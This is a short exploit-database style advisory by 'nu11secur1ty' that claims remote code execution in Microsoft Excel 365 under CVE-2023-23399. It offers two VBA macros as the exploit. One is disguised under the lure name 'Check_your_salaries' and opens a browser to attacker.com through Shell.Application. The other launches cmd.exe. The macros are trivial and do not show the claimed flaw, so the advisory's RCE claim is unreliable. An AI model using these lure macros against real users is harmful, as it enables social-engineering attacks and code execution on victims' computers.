## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 03.16.2023 ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel ## Software: https://www.microsoft.com/en-us/microsoft-365/excel ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/ ## CVE ID: CVE-2023-23399 ## Description: The malicious user can exploit the victim's PC remotely. For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer. STATUS: HIGH Vulnerability [+]Exploit0: ``` Sub Check_your_salaries() CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com" End Sub ``` [+]Exploit1: ``` Sub cmd() Dim Program As String Dim TaskID As Double On Error Resume Next Program = "cmd.exe" TaskID = Shell(Program, 1) If Err <> 0 Then MsgBox "Can't start " & Program End If End Sub ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399) ## Proof and Exploit: [href](https://streamable.com/dnyfx0) ## Time spend: 03:00:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty